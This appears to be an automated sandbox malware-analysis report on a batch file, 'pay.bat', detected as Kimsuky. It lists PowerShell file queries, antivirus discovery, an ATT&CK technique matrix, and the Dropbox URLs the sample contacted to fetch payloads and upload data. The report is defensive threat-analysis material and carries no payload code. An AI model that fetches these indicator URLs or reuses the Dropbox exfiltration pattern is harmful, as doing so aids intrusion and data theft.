                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
                Source: powershell.exe, 00000003.00000002.1968184626.0000019FD32E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1970418937.0000019FD3351000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1966047101.0000019FD2FD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : select * from AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected Kimsuky
                Source: Yara matchFile source: 00000002.00000002.1821493344.000002C3DAF45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1836552794.0000019FBB236000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1836552794.0000019FBB23A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1821493344.000002C3DAF29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1820985216.000002C3D9990000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1821493344.000002C3DAF2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2124, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5480, type: MEMORYSTR
                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\system_first.ps1, type: DROPPED
                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\temp.ps1, type: DROPPED

                Remote Access Functionality

                barindex
                Yara detected Kimsuky
                Source: Yara matchFile source: 00000002.00000002.1821493344.000002C3DAF45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1836552794.0000019FBB236000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1836552794.0000019FBB23A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1821493344.000002C3DAF29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1820985216.000002C3D9990000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1821493344.000002C3DAF2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2124, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5480, type: MEMORYSTR
                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\system_first.ps1, type: DROPPED
                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\temp.ps1, type: DROPPED

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting                		Valid Accounts12
                Windows Management Instrumentation                		1
                Scripting                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping131
                Security Software Discovery                		Remote Services1
                Archive Collected Data                		11
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		131
                Virtualization/Sandbox Evasion                		LSASS Memory1
                Process Discovery                		Remote Desktop ProtocolData from Removable Media1
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts2
                PowerShell                		Logon Script (Windows)Logon Script (Windows)11
                Process Injection                		Security Account Manager131
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Obfuscated Files or Information                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture14
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Software Packing                		LSA Secrets21
                System Information Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1563601 Sample: pay.bat Startdate: 27/11/2024 Architecture: WINDOWS Score: 96 26 edge-block-www-env.dropbox-dns.com 2->26 28 edge-block-api-env.dropbox-dns.com 2->28 30 5 other IPs or domains 2->30 38 Malicious sample detected (through community Yara rule) 2->38 40 Yara detected Kimsuky 2->40 42 Suspicious powershell command line found 2->42 44 5 other signatures 2->44 7 cmd.exe 1 2->7         started        10 powershell.exe 23 2->10         started        signatures3 process4 file5 46 Suspicious powershell command line found 7->46 48 Bypasses PowerShell execution policy 7->48 13 powershell.exe 14 40 7->13         started        18 conhost.exe 7->18         started        22 C:\Users\user\AppData\Roaming\temp.ps1, ASCII 10->22 dropped 50 Loading BitLocker PowerShell Module 10->50 20 conhost.exe 10->20         started        signatures6 process7 dnsIp8 32 edge-block-www-env.dropbox-dns.com 162.125.65.15, 443, 49730, 49731 DROPBOXUS United States 13->32 34 edge-block-api-env.dropbox-dns.com 162.125.69.14, 443, 49734, 49735 DROPBOXUS United States 13->34 36 api-env.dropbox-dns.com 162.125.69.19, 443, 49732, 49733 DROPBOXUS United States 13->36 24 C:\Users\user\AppData\...\system_first.ps1, ASCII 13->24 dropped 52 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 13->52 54 Found suspicious powershell code related to unpacking or dynamic code loading 13->54 56 Loading BitLocker PowerShell Module 13->56 file9 signatures10

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                pay.bat0%ReversingLabs

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://api.dropboxap0%Avira URL Cloudsafe
                https://api.drH0%Avira URL Cloudsafe
                https://content.dropboxaH0%Avira URL Cloudsafe
                https://content.drop0%Avira URL Cloudsafe
                http://crl.microsoftz80%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                api-env.dropbox-dns.com
                		162.125.69.19
                		truefalse
                  		high
                  edge-block-www-env.dropbox-dns.com
                  		162.125.65.15
                  		truefalse
                    		high
                    edge-block-api-env.dropbox-dns.com
                    		162.125.69.14
                    		truefalse
                      		high
                      dl.dropboxusercontent.com
                      		unknown
                      		unknownfalse
                        		high
                        api.dropboxapi.com
                        		unknown
                        		unknownfalse
                          		high
                          content.dropboxapi.com
                          		unknown
                          		unknownfalse
                            		high

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://dl.dropboxusercontent.com/scl/fi/g7mcshkx3qmo5mvytf2ct/santa2-x.txt?rlkey=5nbbqegc5a77r76hiym6s9y2h&st=727cs1mx&dl=0false
                              		high
                              https://api.dropboxapi.com/oauth2/tokenfalse
                                		high
                                https://dl.dropboxusercontent.com/scl/fi/dkuamlrlsrbygso1swn8p/santa2-f.txt?rlkey=r8fe0viier1mwv9azk5awy5s9&st=yvqqfdfy&dl=0false
                                  		high
                                  https://content.dropboxapi.com/2/files/uploadfalse
                                    		high

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://content.dropboxaHpowershell.exe, 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1844637093.000002C3E9B32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1957253822.0000019FCAEB3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1957253822.0000019FCB037000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000002.00000002.1821493344.000002C3D9CEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1821493344.000002C3DB83E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1821493344.000002C3DB9E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://content.dropboxapi.com/2/files/uploadppowershell.exe, 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://edge-block-api-env.dropbox-dns.compowershell.exe, 00000002.00000002.1821493344.000002C3DB09F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBD3EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.dropbox.com/csp_log?policy_name=blockserver-usercontentpowershell.exe, 00000002.00000002.1821493344.000002C3DAF1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1821493344.000002C3DAEFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBB21A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBB227000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://dl.dropboxusercontent.compowershell.exe, 00000002.00000002.1821493344.000002C3DAEFE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
